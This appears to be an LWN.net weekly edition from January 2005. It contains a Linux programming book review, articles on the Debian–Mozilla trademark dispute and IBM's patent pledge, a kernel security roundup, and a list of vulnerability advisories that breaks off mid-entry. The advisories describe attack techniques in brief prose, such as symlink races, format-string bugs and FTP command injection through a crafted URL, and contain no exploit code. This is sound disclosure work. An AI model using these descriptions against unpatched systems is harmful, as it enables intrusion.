Review: Linux Application Development, Second Edition
In the late 1990's, Linux began to attract large-scale attention beyond the
relatively small, hacker community which had been working on it for some
![[LAD cover]](/images/ns/linux-application-development.jpg)
time. With all that attention came many new developers who liked what they
saw and wanted to be a part of it. The book that many of those developers
kept next to their keyboard was the classic
Linux Application
Development (LAD), by early Red Hat hackers Michael K. Johnson and Erik
W. Troan. LAD was published in 1998, meaning that, at this point, it is
vastly out of date. The Linux world does not stand still, and does not
make life easy for those who would publish technical reference books.
Trust your editor on this.
So it was a pleasant surprise to see a new edition of LAD show up in the
mail. This core text, it turns out, has not gone out of maintenance after
all.
According to the preface:
You can now browse and search the entire content of this book at
http://ladweb.net to make this book even
more useful to you.
As of this writing, the web site has not caught up with that claim - it
still discusses the first edition (and with no "entire content") to
browse. One assumes that situation will be rectified in time. If the book
is being released under some sort of free license, however, that
is not stated explicitly.
The structure and content of the book has not changed all that much from
the first edition: LAD still concerns itself with low-level Linux
programming, system calls, and some C libraries. The updates are to be
found in the details: the text now matches, for the most part, the
interfaces provided by the 2.6 kernel and glibc 2.3. Some new interfaces
(such as epoll()) have been covered, and there is a new chapter on
security pitfalls and how to avoid them. The discussion of the socket
interface covers IPv6, the regular expression discussion has been expanded,
real-time signals are covered, etc.
With these changes, LAD is, once again, the definitive reference for the
low-level Linux C API. Whether you need to learn about memory allocation
debugging facilities, the details of process management, file descriptor
magic, or more, you're likely to find what you need in this book. Much of
that information is also available in generic Unix texts; the difference is
that LAD looks at exactly what Linux offers. While Linux follows the
relevant standards to a great degree, there are many places where Linux
diverges from the standards or offers extra capabilities. A reference book
which documents the Linux way of doing things is a good thing.
That said, your editor does have some quibbles with the second edition.
One is that the update appears, in many places, to have been done in a
hurry. The LGPL is called the "Library General Public License" - but it
has not had that name for quite a few years now. The recommended system
administration book is Sobel's A Practical Guide to Red Hat
Linux 8. The (new) documentation
of strace claims that it writes to the standard output, which is
not true (it writes to stderr). Passwords, it claims, are usually stored
in /etc/passwd. Many flags to the clone() system call
are missing; a number of mmap() flags are absent as well. Your
editor may have been willing to forgive all of this if the authors, while
being nice enough to mention Linux Device Drivers, had noticed that
a new edition has come out since 1998.
Perhaps more to the point, however, LAD may be falling behind the way that
applications are being developed for Linux. Your editor has certainly done
his time writing ioctl() calls to control TTY parameters - but not
recently. The chapters on virtual consoles and S-Lang seem rather quaint.
While a great deal of Linux software is still developed in C, quite a bit
is not. After reading LAD, one might almost conclude that graphical
applications simply do not exist under Linux. The authors clearly had to
limit their scope, and they cannot be faulted for failing to document, say,
the GNOME and KDE libraries. But the second edition could have been an
ideal vehicle for pointing developers toward the sorts of tools being used
for new code, and away from writing TTY-oriented applications.
That said, application developers still need to understand how to manage
memory, create processes, handle signals, work with files, etc. The second
edition of Linux Application Development fills that need and more;
it is a most welcome update. It will, beyond doubt, find a location very
near the keyboards of a great many Linux application hackers.
Comments (2 posted)
Debian and Mozilla - a study in trademarks
The Mozilla Foundation is the keeper of a number of increasingly important
projects, including the Firefox web browser and the Thunderbird mail
client. These programs are free software, licensed under the Mozilla
Public License. Thus, one would think, distributors would have no trouble
including these packages in their distributions. As the Debian Project's
experience shows, however, free software can still come with certain kinds
of strings attached.
The issue at hand is trademarks. Mozilla Foundation software comes with
trademarked names, and the use of those names is governed by the Mozilla
Trademark Policy. If you want to distribute software called "Mozilla
Firefox" or "Mozilla Thunderbird," you must adhere to a
strict policy which includes signing an agreement with the Foundation
and making almost no changes to the software. No extensions may be added,
the list of search engines cannot be changed (they paid to be there, after all), etc. This
highly-restrictive policy was never going to work with the Debian Project's
needs.
Another approach is the "community edition" policy. A wider (but still
narrow) range of
changes is allowed, and the distributor can use the names "Firefox
Community Edition." The commands can be called firefox and
thunderbird. The Foundation maintains a veto right over uses of
the "community edition" names, however:
Community members and organizations can start using the "Firefox
Community Edition" and "Thunderbird Community Edition" trademarks
from day one, but the Mozilla Foundation may require individuals or
teams to stop doing so in the future if they are redistributing
software with low quality and efforts to remedy the situation have
not succeeded.
So anybody distributing a "community edition" must live with the
possibility of receiving a "takedown notice" from the Mozilla Foundation at
any time. The Foundation's goals are certainly understandable:
...we need to keep enough control over our trademarks to make sure
they are a sign of quality and safety. It needs to be impossible,
for example, for someone to release a product called 'Firefox' that
has added spyware. We want to avoid someone building a
highly-optimized but unstable build and passing it off as
official.
Most readers will agree that a spyware-enabled Firefox is a bad idea,
though whether purveyors of spyware will have much respect for trademarks
is an open question.
The Debian Project insists on shipping nothing but free software, and
freedom certainly includes the right to modify the code. Debian currently
includes patches which may go beyond the
trademark policy's guidelines - an extension manager which understands
multi-user systems, for example. A strict reading of the community edition
guidelines suggests that not even security patches could be distributed
without prior approval from the Mozilla Foundation. The Debian Project
certainly wants to be able to distribute modified versions of the code; the
Project is also known for a close and literal reading of licenses. So the
Debian developers are concerned about the whole trademark issue.
The Mozilla Foundation wants to work with
Debian to get past these issues:
We want people to use Thunderbird in Debian, and to know they are
using Thunderbird, and to get the high quality experience people
get from using our Thunderbird. And we want to come to some
arrangement with Debian to make that possible.
This arrangement could possibly include allowing Debian to apply its own
patches to Firefox and Thunderbird and still use the community names. The
Foundation seems to have a fairly high level of trust in Debian's ability
to keep the quality up. Debian's users are another story, however:
However, you guys want the freedom to ship software that sucks -
or, more to the point and more likely, want to be able to easily
give your software to other people and allow them to make it suck
and then ship it. If that software ships using our trademarks, then
that is incompatible with our trademark goals. So if we can't come
to some arrangement that lets Debian use them but asks
redistributors to contact us or remove them, then it's increasingly
looking like we can't square this circle.
So it looks somewhat like the Foundation would like to make a special policy
exemption for Debian. The problem there is that Debian-specific licenses
violate section 8 of the Debian Free
Software Guidelines. Those guidelines apply to software licenses, not
trademark policies, but the principle remains the same. The Debian Project
is unlikely to accept a policy which does not extend to its users.
The discussion has quieted - it may have gone into a non-public
mode - so it is difficult to say where things stand now. If an agreement
cannot be found, Debian will still be able to distribute Firefox and
Thunderbird - they are free software - but different names will have
to be chosen. "Iceweasel" has been the working code name for this scenario;
many other names have been suggested as well. This outcome would not be
pleasing to any of the parties involved, however; one assumes it will be
avoided if at all possible.
Mozilla is unlikely to be the last project that decides that it wants to
achieve some sort of quality control through its trademarks. That wish is
understandable, but it is also very much at odds with the spirit of free
software, which involves letting go of the code. One has to accept that
not everybody will have the same idea of what makes "high quality."
Incidents of free software projects being harmed by distribution of
poorly-done modifications have been rare, and, perhaps, are not worth the
worry that is being put into them here. Mozilla has done an outstanding
job of creating powerful and useful software; now, perhaps, the Foundation
may want to relax and trust its users just a little more.
Comments (49 posted)
IBM's patent pledge
On January 11, IBM
announced
that it would make 500 patents available for use in projects using
Open Source Initiative (OSI) approved
licenses.
The list of patents and IBM's pledge is available
as a
PDF. According to the statement, IBM has indicated it will not assert
any of the 500 patents against distributors of open source software, so
long as the distributing party does not file lawsuits using patents or
other intellectual property rights against open source software.
The list of patents ranges from a "Method and apparatus for batching the
receipt of data packets" (U.S. Patent Number 5,260,942) to a "System and
method for ensuring QoS in a token ring network" (5,642,421). Given that
IBM has listed 500 patents, this reporter has not had time to read each
patent, but suffice it to say that the patents cover a wide range of
applications from human language processing to web services and data
processing.
Reaction to IBM's move has been mixed. OSDL's Stuart Cohen is apparently in
support of IBM's pledge, and Larry Lessig was also quoted as saying
that it was "exciting."
Others were not so impressed. Florian Mueller points
out that "We're talking about roughly one percent of IBM's
worldwide patent portfolio. They file that number of patents in about a
month's time." Mueller also called it a "diversionary
tactic, which may be accurate given IBM's support
of the European Patent Directive that has been denounced
by many of the leading members of the open source community.
There is ample room for skepticism. IBM's move offers up only a small
portion of its patent portfolio for use by open source projects. To put
it another way, IBM is withholding the remainder of its patent portfolio,
without any assurance that open source projects (with the exception of the
Linux kernel) are safe from potential litigation.
We spoke to IBM's manager of worldwide Linux marketing strategy, Adam
Jollans, about the patents. Jollans said that IBM was "seeing a shift
from innovation in commercial companies to cooperative innovation,"
and that the patent pledge was a way to support that.
We asked why IBM picked 500 rather than 50 or 5,000, or simply giving open
source a pass altogether. Jollans said that IBM "has to start
somewhere" and that 500 was a number that would prove it
was a significant announcement. No reason was given for holding back the
majority of IBM's patent portfolio. Jollans did say that IBM's choice of
patents was not random, and were picked because they were "500 that
we believe will be useful" to open source.
IBM's move could also be seen as an attempt to take some of the steam out
of the anti-software patent movement in Europe as the EU considers a motion
to start
over with the software patent directive. We also asked why IBM had not
chosen to take a stand against software patents altogether. Jollans said
that IBM supported patents, but that "patents should reflect
innovation rather than just a general idea."
Jollans said that IBM is encouraging other companies to step up and offer
the use of their patents for open source as well. Whether or not any
companies will do so is yet to be seen.
By offering only a small sample of its patent portfolio, IBM is
well-positioned to take offensive action should it ever decide to do so. If
there were an open source project that IBM wanted to quash, there are more
patents where the first 500 came from. IBM has
shown no interest in launching patent attacks against free software, and
the company certainly understands what such an attack would do to its
standing in the community. Even so,
there's no guarantee that IBM will always be so well-intentioned.
Ultimately, IBM's "patent pledge" is a good PR move, but little more. IBM
has little to gain from asserting its patents against open source projects,
and stands to benefit from the continued development of Linux and other
open source projects. By offering a non-aggression pact towards open source
projects, IBM effectively says it's OK to develop programs that might
infringe on (some of) its patents, so long as those programs are available to IBM
under open source terms. That's a far cry from the desired outcome of
barring software patents altogether, but it's still a step in the right
direction.
Comments (26 posted)
Page editor: Jonathan Corbet
Security
Linux kernel security
There has been a surprising series of kernel security problems reported
over the last week. These include:
- The uselib() vulnerability disclosed
by Paul Starzetz. A locking mistake in an old and mostly unused
system call creates a race condition which can be exploited to change
protections on memory - and compromise the system. The exploit has
not been released, but Mr. Starzetz claims that the race is relatively
easy to exploit by first consuming large amounts of memory to force
the kernel to sleep in the right spot.
- Paul Starzetz also discovered a race
condition in the page fault handler which can only be exploited on
SMP systems. If two threads tried to expand the same downward-growing
memory segment at the same time, the result could be an exploitable
corruption of the page tables.
- The grsecurity team, frustrated at a seeming lack of interest in
security problems among the kernel developers, disclosed five vulnerabilities at once.
One of these is a denial-of-service problem where users could lock
more than the authorized amount of memory into physical RAM; as it
turns out, the kernel developers still are
not overly concerned about that problem. The other
vulnerabilities require root access (or at least access to physical
devices) to exploit; one of them is in a driver which does not compile
in 2.6.
Fixes for the first two vulnerabilities have been merged into the
pre-2.6.11 BitKeeper repository; the last set will be fixed as well, but
with less urgency. Fixes can also be found in the -ac tree and in the updated kernels being
issued by distributors.
One concern that has been raised by these disclosures is that the new
kernel development model, by encouraging such large changes between
releases, is allowing the creation of more security problems. While that
worry could yet prove to be justified, all of the vulnerabilities listed
above, with the exception of the RLIMIT_MEMLOCK denial of service
problem, are present in the 2.4 kernel as well. They were not introduced
or enabled by the new development model.
Another concern is more valid, however: the kernel development project does
not have an official security contact or process for handling security
problems. Developers who know how the kernel process works have no trouble
getting consideration for security-related problems and patches, but the
whole process looks far more opaque to the rest of the world. There is a
clear need for an easily-found contact for kernel security issues. Chris
Wright, who has done a fair amount of security-related kernel work, is pushing for improvements in this area, and,
most importantly, has volunteered to do much of the work. So chances are
this problem will not last much longer.
Comments (11 posted)
New vulnerabilities
bmv: insecure temporary file
| Package(s): | bmv |
CVE #(s): | CAN-2003-0014
|
| Created: | January 11, 2005 |
Updated: | January 12, 2005 |
| Description: |
Peter Samuelson, upstream maintainer of bmv, a PostScript viewer for
SVGAlib, discovered that temporary files are created in an insecure
fashion. A malicious local user could cause arbitrary files to be
overwritten by a symlink attack. |
| Alerts: |
|
Comments (none posted)
dillo: format string vulnerability
| Package(s): | dillo |
CVE #(s): | CAN-2005-0012
|
| Created: | January 10, 2005 |
Updated: | January 12, 2005 |
| Description: |
Gentoo Linux developer Tavis Ormandy found a format string bug in Dillo's
handling of messages in a_Interface_msg(). An attacker could craft a
malicious web page which, when accessed using Dillo, would trigger the
format string vulnerability and potentially execute arbitrary code with the
rights of the user running Dillo. |
| Alerts: |
|
Comments (none posted)
exim: buffer overflows
Comments (1 posted)
hylafax: weak hostname and username validation
| Package(s): | hylafax |
CVE #(s): | CAN-2004-1182
|
| Created: | January 11, 2005 |
Updated: | January 13, 2005 |
| Description: |
Patrice Fournier discovered a vulnerability in the authorization
subsystem of hylafax, a flexible client/server fax system. A local or
remote user guessing the contents of the hosts.hfaxd database could
gain unauthorized access to the fax system. Fixed in HylaFAX
4.2.1. |
| Alerts: |
|
Comments (none posted)
kdelibs: unsanitzied input
| Package(s): | kdelibs |
CVE #(s): | CAN-2004-1165
|
| Created: | January 10, 2005 |
Updated: | July 19, 2005 |
| Description: |
Thiago Macieira discovered a vulnerability in the kioslave library,
which is part of kdelibs, which allows a remote attacker to execute
arbitrary FTP commands via an ftp:// URL that contains an URL-encoded
newline before the FTP command. |
| Alerts: |
|
Comments (none posted)
kernel: race condition, privilege escalation
| Package(s): | kernel |
CVE #(s): | CAN-2004-1235
CAN-2004-1337
|
| Created: | January 10, 2005 |
Updated: | January 19, 2005 |
| Description: |
Paul Starzetz discovered a race condition in the ELF library and a.out
binary format loaders, which can be locally exploited in several
different ways to gain root privileges. (CAN-2004-1235)
Liang Bin found a design flaw in the capability module. After this
module was loaded on demand in a running system, all unprivileged user
space processes got all kernel capabilities (thus essentially root
privileges). (CAN-2004-1337) |
| Alerts: |
|
Comments (none posted)
Konqueror: Java sandbox vulnerabilities
| Package(s): | konqueror |
CVE #(s): | CAN-2004-1145
|
| Created: | January 11, 2005 |
Updated: | January 12, 2005 |
| Description: |
According to this KDE
Security Advisory, two flaws in the Konqueror web browser make it
possible to by pass the sandbox environment which is used to run
Java-applets. All versions of KDE up to KDE 3.3.1 inclusive are affected.
KDE 3.3.2 is not affected. |
| Alerts: |
|
Comments (none posted)
lintian: insecure temporary directory
| Package(s): | lintian |
CVE #(s): | CAN-2004-1000
|
| Created: | January 10, 2005 |
Updated: | January 12, 2005 |
| Description: |
Jeroen van Wolffelaar discovered a problem in lintian, the Debian
package checker. The program removes the working directory even if it
wasn't created at program start, removing an unrelated file or
directory a malicious user inserted via a symlink attack. |
| Alerts: |
|
Comments (none posted)
mailman: cross-site scripting
| Package(s): | mailman |
CVE #(s): | CAN-2004-1177
|
| Created: | January 10, 2005 |
Updated: | March 22, 2005 |
| Description: |
Florian Weimer discovered a cross-site scripting vulnerability in
mailman's automatically generated error messages. An attacker could
craft an URL containing JavaScript (or other content embedded into
HTML) which triggered a mailman error page. When an unsuspecting user
followed this URL, the malicious content was copied unmodified to the
error page and executed in the context of this page. |
| Alerts: |
|
Comments (none posted)
namazu2: cross-site scripting vulnerability
| Package(s): | namazu2 |
CVE #(s): | CAN-2004-1318
|
| Created: | January 6, 2005 |
Updated: | January 12, 2005 |
| Description: |
The namazu2 full text search engine has a cross-site scripting vulnerability
that may allow an attacker to display arbitrarily crafted text
by the use of specially crafted input information. |
| Alerts: |
|
Comments (none posted)
nfs-utils: arbitrary code execution
| Package(s): | nfs-utils |
CVE #(s): | CAN-2004-0946
|
| Created: | January 11, 2005 |
Updated: | February 27, 2006 |
| Description: |
Arjan van de Ven discovered a buffer overflow in rquotad on 64bit
architectures; an improper integer conversion could lead to a buffer
overflow. An attacker with access to an NFS share could send a specially
crafted request which could then lead to the execution of arbitrary code. |
| Alerts: |
|
Comments (none posted)
o3read: buffer overflow during file conversion
| Package(s): | o3read |
CVE #(s): | CAN-2004-1288
|
| Created: | January 11, 2005 |
Updated: | January 12, 2005 |
| Description: |
Wiktor Kopec discovered that
the parse_html function in o3read.c copies any number of bytes into a
1024-byte array. |
| Alerts: |
|
Comments (none posted)
phpgroupware: information disclosure vulnerability
| Package(s): | phpgroupware |
CVE #(s): | |
| Created: | January 6, 2005 |
Updated: | January 12, 2005 |
| Description: |
phpgroupware has multiple vulnerabilities that may
be exploited for the purpose of information disclosure
or a remote compromise. |
| Alerts: |
|
Comments (none posted)
poppassd_pam: unauthorized password changing
| Package(s): | poppassd_pam |
CVE #(s): | CAN-2005-0002
|
| Created: | January 11, 2005 |
Updated: | January 12, 2005 |
| Description: |
Gentoo Linux developer Marcus Hanwell discovered that poppassd_pam did
not check that the old password was valid before changing passwords.
Subsequent investigation revealed that poppassd_pam did not call
pam_authenticate before calling pam_chauthtok. |
| Alerts: |
|
Comments (none posted)
TikiWiki: arbitrary command execution
| Package(s): | TikiWiki |
CVE #(s): | |
| Created: | January 10, 2005 |
Updated: | January 31, 2005 |
| Description: |
TikiWiki lacks a check on uploaded images in the Wiki edit page. A
malicious user could run arbitrary commands on the server by uploading and
calling a PHP script. |
| Alerts: |
|
Comments (none posted)
UnRTF: Buffer overflow
| Package(s): | unrtf |
CVE #(s): | |
| Created: | January 11, 2005 |
Updated: | January 12, 2005 |
| Description: |
An unchecked strcat() in unrtf may overflow the bounds of a static buffer.
Using a specially crafted file, possibly delivered by e-mail or over the
web, an attacker may execute arbitrary code with the permissions of the
user running UnRTF. |
| Alerts: |
|
Comments (1 posted)
vilistextum: buffer overflow vulnerability
| Package(s): | vilistextum |
CVE #(s): | CAN-2004-1299
|
| Created: | January 6, 2005 |
Updated: | January 12, 2005 |
| Description: |
Vilistextum has a buffer overflow vulnerability that can
allows an attacker
to execute arbitrary code via a maliciously created web page. |
| Alerts: |
|
Comments (none posted)
Updated vulnerabilities
a2ps: input validation error
| Package(s): | a2ps |
CVE #(s): | CAN-2004-1170
CAN-2004-1377
|
| Created: | November 26, 2004 |
Updated: | December 19, 2005 |
| Description: |
The GNU a2ps utility fails to properly sanitize filenames, which can be
abused by a malicious user to execute arbitrary commands with the
privileges of the user running the vulnerable application. More
information at Security
Focus. |
| Alerts: |
|
Comments (none posted)
cdrecord: failure to drop privilege
| Package(s): | cdrecord |
CVE #(s): | CAN-2004-0806
|
| Created: | September 8, 2004 |
Updated: | February 21, 2005 |
| Description: |
The cdrecord utility, which is installed setuid on some distributions, fails to drop privilege before running a user-specified program. |
| Alerts: |
|
Comments (none posted)
cups: multiple vulnerabilities
| Package(s): | cups |
CVE #(s): | CAN-2004-1267
CAN-2004-1268
CAN-2004-1269
CAN-2004-1270
|
| Created: | December 17, 2004 |
Updated: | February 9, 2005 |
| Description: |
cups has a denial of service vulnerability in the lppasswd utility
and a remote code execution vulnerability in the hpgltops filter. |
| Alerts: |
|
Comments (none posted)
cyrus-sasl: remote buffer overflow
| Package(s): | cyrus-sasl |
CVE #(s): | CAN-2004-0884
|
| Created: | October 7, 2004 |
Updated: | March 16, 2005 |
| Description: |
cyrus-sasl has a vulnerability involving a buffer overflow
in the digestmda5.c file. A remote attacker may be able
to compromise the system. Also, a local user may be able to
exploit a vulnerability by using the SASL_PATH environment
variable. |
| Alerts: |
|
Comments (none posted)
debmake: insecure temp directories
| Package(s): | debmake |
CVE #(s): | CAN-2004-1179
|
| Created: | December 23, 2004 |
Updated: | January 4, 2005 |
| Description: |
debmake contains a script that can make insecure temporary directories.
This can be used by a symlink attack to create and overwrite arbitrary files. |
| Alerts: |
|
Comments (none posted)
dhcp: format string vulnerability
| Package(s): | dhcp |
CVE #(s): | CAN-2004-1006
|
| Created: | November 4, 2004 |
Updated: | July 13, 2005 |
| Description: |
Dhcp has a format string vulnerability in the log functions of dhcp 2.x
that may be exploited via a malicious DNS server. |
| Alerts: |
|
Comments (none posted)
ethereal: multiple vulnerabilities
| Package(s): | ethereal |
CVE #(s): | CAN-2004-1139
CAN-2004-1140
CAN-2004-1141
CAN-2004-1142
|
| Created: | December 20, 2004 |
Updated: | January 13, 2005 |
| Description: |
There are multiple vulnerabilities in versions of Ethereal earlier than
0.10.8, including:
- Bug in DICOM dissection discovered by Bing could make Ethereal crash
(CAN-2004-1139).
- An invalid RTP timestamp could make Ethereal hang and create a large
temporary file (CAN-2004-1140).
- The HTTP dissector could access previously-freed memory
(CAN-2004-1141).
- Brian Caswell discovered that an improperly formatted SMB could
make Ethereal hang (CAN-2004-1142).
|
| Alerts: |
|
Comments (none posted)
Filename disclosure vulnerability in fam
| Package(s): | fam |
CVE #(s): | CAN-2002-0875
|
| Created: | August 19, 2002 |
Updated: | January 5, 2005 |
| Description: |
"fam" (file alteration monitor) watches files and directories for changes and lets interested applications know when something happens. This package has a flaw in its group handling that blocks some legitimate operations while, at the same time, exposing the names of files that should otherwise be invisible. |
| Alerts: |
|
Comments (none posted)
Foomatic: Arbitrary command execution in foomatic-rip
| Package(s): | foomatic |
CVE #(s): | CAN-2004-0801
|
| Created: | September 20, 2004 |
Updated: | May 31, 2006 |
| Description: |
There is a vulnerability in the foomatic-filters package. This
vulnerability is due to insufficient checking of command-line parameters
and environment variables in the foomatic-rip filter. This vulnerability
may allow both local and remote attackers to execute arbitrary commands on
the print server with the permissions of the spooler. |
| Alerts: |
|
Comments (none posted)
FreeRADIUS: denial of service
| Package(s): | freeradius |
CVE #(s): | CAN-2004-0938
CAN-2004-0960
CAN-2004-0961
|
| Created: | September 22, 2004 |
Updated: | February 2, 2005 |
| Description: |
FreeRADIUS (through version 1.0.1) suffers from several denial of service vulnerabilities in its packet reception code. |
| Alerts: |
|
Comments (none posted)
gaim: buffer overflow in MSN protocol
| Package(s): | gaim |
CVE #(s): | CAN-2004-0891
|
| Created: | October 25, 2004 |
Updated: | February 11, 2005 |
| Description: |
A buffer overflow in the MSN protocol handler for gaim 0.79 to 1.0.1 allows
remote attackers to cause a denial of service (application crash) and
possibly execute arbitrary code via an "unexpected sequence of MSNSLP
messages" that results in an unbounded copy operation that writes to the
wrong buffer. |
| Alerts: |
|
Comments (none posted)
Gallery: cross-site scripting vulnerability
| Package(s): | Gallery |
CVE #(s): | CAN-2004-1106
|
| Created: | November 8, 2004 |
Updated: | January 17, 2005 |
| Description: |
Jim Paris has discovered a cross-site scripting vulnerability in
Gallery. By sending a carefully crafted URL, an attacker can inject and
execute script code in the victim's browser window, and potentially
compromise the users gallery. |
| Alerts: |
|
Comments (none posted)
gtk2, gdk-pixbuf: buffer overflows
| Package(s): | gdk-pixbuf gtk2 |
CVE #(s): | CAN-2004-0753
CAN-2004-0782
CAN-2004-0783
CAN-2004-0788
|
| Created: | September 15, 2004 |
Updated: | February 25, 2005 |
| Description: |
The gdk-pixbuf and gtk2 libraries contain vulnerabilities in their handling of BMP and XPM files which can lead to denial of service and, potentially, code execution attacks. |
| Alerts: |
|
Comments (none posted)
gettext: Insecure temporary file handling
| Package(s): | gettext |
CVE #(s): | CAN-2004-0966
|
| Created: | October 11, 2004 |
Updated: | March 1, 2006 |
| Description: |
gettext insecurely creates temporary files in world-writeable directories
with predictable names. A local attacker could create symbolic links in
the temporary files directory, pointing to a valid file somewhere on the
filesystem. When gettext is called, this would result in file access with
the rights of the user running the utility, which could be the root user. |
| Alerts: |
|
Comments (1 posted)
ghostscript: symlink vulnerabilities
| Package(s): | ghostscript |
CVE #(s): | CAN-2004-0967
|
| Created: | October 20, 2004 |
Updated: | September 28, 2005 |
| Description: |
The ghostscript package (prior to version 7.07.1-r7) contains several scripts which are vulnerable to symlink attacks. |
| Alerts: |
|
Comments (none posted)
glibc: Information leak with LD_DEBUG
| Package(s): | glibc |
CVE #(s): | CAN-2004-1453
|
| Created: | August 17, 2004 |
Updated: | May 26, 2005 |
| Description: |
Silvio Cesare discovered a potential information leak in glibc. It allows
LD_DEBUG on SUID binaries where it should not be allowed. This has various
security implications, which may be used to gain confidential information.
An attacker can gain the list of symbols a SUID application uses and their
locations and can then use a trojaned library taking precedence over those
symbols to gain information or perform further exploitation. |
| Alerts: |
|
Comments (1 posted)
glibc: tempfile vulnerability in catchsegv script
| Package(s): | glibc |
CVE #(s): | CAN-2004-0968
|
| Created: | October 21, 2004 |
Updated: | November 14, 2005 |
| Description: |
The catchsegv script in the glibc package has a symlink vulnerability
that may allow a local user to overwrite arbitrary
files with the permissions of the user that is running the script. |
| Alerts: |
|
Comments (none posted)
gnome-vfs: backend script vulnerabilities
| Package(s): | gnome-vfs |
CVE #(s): | CAN-2004-0494
|
| Created: | August 4, 2004 |
Updated: | February 21, 2005 |
| Description: |
Several scripts packaged with gnome-vfs, using its "extfs" capability, have security flaws. These scripts tend not to be used on many systems, but their presence can still be a threat. |
| Alerts: |
|
Comments (none posted)
groff: insecure temp file
| Package(s): | groff |
CVE #(s): | CAN-2004-1296
|
| Created: | December 20, 2004 |
Updated: | January 17, 2005 |
| Description: |
Javier Fernández-Sanguino Peña discovered that the auxiliary scripts
"eqn2graph" and "pic2graph" created temporary files in an insecure
way, which allowed exploitation of a race condition to create or
overwrite files with the privileges of the user invoking the program. |
| Alerts: |
|
Comments (1 posted)
groff: insecure temporary directory
| Package(s): | groff |
CVE #(s): | CAN-2004-0969
|
| Created: | November 1, 2004 |
Updated: | February 9, 2006 |
| Description: |
Recently, Trustix Secure Linux discovered a vulnerability in the groff
package. The utility "groffer" created a temporary directory in an
insecure way, which allowed exploitation of a race condition to create
or overwrite files with the privileges of the user invoking the
program. |
| Alerts: |
|
Comments (none posted)
gtkhtml: malformed messages cause crash
| Package(s): | gtkhtml |
CVE #(s): | CAN-2003-0133
CAN-2003-0541
|
| Created: | April 14, 2003 |
Updated: | April 18, 2005 |
| Description: |
GtkHTML is the HTML rendering widget used by the Evolution mail reader.
GtkHTML supplied with versions of Evolution prior to 1.2.4 contain a bug
when handling HTML messages. Alan Cox discovered that certain malformed
messages could cause the Evolution mail component to crash. |
| Alerts: |
|
Comments (none posted)
htmlheadline: insecure temporary files
| Package(s): | htmlheadline |
CVE #(s): | CAN-2004-1181
|
| Created: | January 3, 2005 |
Updated: | January 4, 2005 |
| Description: |
Javier Fernández-Sanguino Peña has discovered multiple insecure uses
of temporary files that could lead to overwriting arbitrary files via
a symlink attack. |
| Alerts: |
|
Comments (none posted)
imlib: buffer overflows in image decoding
| Package(s): | imlib |
CVE #(s): | CAN-2004-1026
|
| Created: | December 6, 2004 |
Updated: | January 13, 2005 |
| Description: |
Pavel Kankovsky discovered that several overflows found in the libXpm
library also applied to imlib. He also fixed a number of other potential
flaws. A remote attacker could entice a user to view a carefully-crafted
image file, which would potentially lead to execution of arbitrary code
with the rights of the user viewing the image. This affects any program
that makes use of the imlib library. |
| Alerts: |
|
Comments (none posted)
imlib2: buffer overflows
| Package(s): | imlib2 |
CVE #(s): | CAN-2004-0802
CAN-2004-0817
|
| Created: | September 8, 2004 |
Updated: | October 26, 2005 |
| Description: |
The imlib2 library contains buffer overflows in the BMP handling code. |
| Alerts: |
|
Comments (none posted)
iptables: missing initialization
| Package(s): | iptables |
CVE #(s): | CAN-2004-0986
|
| Created: | November 1, 2004 |
Updated: | February 11, 2005 |
| Description: |
Faheem Mitha noticed that the iptables command, an administration tool for
IPv4 packet filtering and NAT, did not always load the required modules on
its own as it was supposed to. This could lead to firewall rules not being
loaded on system startup. This caused a failure in connection with rules
provided by lokkit at least. |
| Alerts: |
|
Comments (none posted)
kdelibs: unwanted email origination
| Package(s): | kdelibs |
CVE #(s): | |
| Created: | January 4, 2005 |
Updated: | January 4, 2005 |
| Description: |
The Konqueror browser (via kdelibs) contains a vulnerability which can cause it to send email without the user's interaction or consent. See this bug report for details. |
| Alerts: |
|
Comments (none posted)
kerberos5: execution of arbitrary code by authenticated user
| Package(s): | kerberos5 |
CVE #(s): | CAN-2004-1189
|
| Created: | December 21, 2004 |
Updated: | February 15, 2005 |
| Description: |
There is a buffer overflow in the password history handling code of
libkadm5srv which could be exploited by an authenticated user to execute
arbitrary code on a Key Distribution Center (KDC) server. |
| Alerts: |
|
Comments (none posted)
kernel: 32bit emulation privilege escalation
| Package(s): | kernel |
CVE #(s): | CAN-2004-1144
|
| Created: | December 23, 2004 |
Updated: | January 5, 2005 |
| Description: |
The 2.4 Linux Kernel on the AMD64 platform has a
missing argument checking vulnerability that can allow
a local attacker to gain root privileges. |
| Alerts: |
|
Comments (none posted)
kernel-utils: setuid vulnerability
| Package(s): | kernel-utils |
CVE #(s): | CAN-2003-0019
|
| Created: | February 7, 2003 |
Updated: | January 21, 2005 |
| Description: |
The kernel-utils package contains several utilities that can be used to
control the kernel or machine hardware. In Red Hat Linux 8.0 this package
contains user mode linux (UML) utilities.
The uml_net utility in kernel-utils packages with Red Hat Linux 8.0 was
incorrectly shipped setuid root. This could allow local users to control
certain network interfaces, add and remove arp entries and routes, and put
interfaces in and out of promiscuous mode.
All users of the kernel-utils package should update to these packages that
contain a version of uml_net that is not setuid root.
Alternatively, as a work-around to this vulnerability issue the following
command as root:
chmod -s /usr/bin/uml_net |
| Alerts: |
|
Comments (none posted)
libgd2: buffer overflows in PNG handling
| Package(s): | libgd2 |
CVE #(s): | CAN-2004-0990
CAN-2004-0941
|
| Created: | October 29, 2004 |
Updated: | June 28, 2006 |
| Description: |
Several buffer overflows have been discovered in libgd's PNG handling
functions.
If an attacker tricked a user into loading a malicious PNG image, they
could leverage this into executing arbitrary code in the context of
the user opening image. Most importantly, this library is commonly
used in PHP. One possible target would be a PHP driven photo website
that lets users upload images. Therefore this vulnerability might lead
to privilege escalation to a web server's privileges.
Multiple buffer overflows in the gd graphics library (libgd) 2.0.21 and
earlier may allow remote attackers to execute arbitrary code via malformed
image files that trigger the overflows due to improper calls to the
gdMalloc function. |
| Alerts: |
|
Comments (none posted)
libpng: multiple vulnerabilities
Comments (1 posted)
libtiff: buffer overflow
| Package(s): | libtiff |
CVE #(s): | CAN-2004-1308
|
| Created: | December 22, 2004 |
Updated: | May 19, 2005 |
| Description: |
The libtiff image manipulation library contains several exploitable buffer overflows. |
| Alerts: |
|
Comments (none posted)
libxml2: multiple buffer overflows
| Package(s): | libxml2 |
CVE #(s): | CAN-2004-0989
|
| Created: | October 28, 2004 |
Updated: | February 28, 2005 |
| Description: |
libxml2 prior to version 2.6.14 has multiple buffer overflow
vulnerabilities, if a local user passes a specially crafted
FTP URL, arbitrary code may be executed. |
| Alerts: |
|
Comments (none posted)
libxpm4: stack and integer overflows
| Package(s): | libxpm4 |
CVE #(s): | CAN-2004-0687
CAN-2004-0688
|
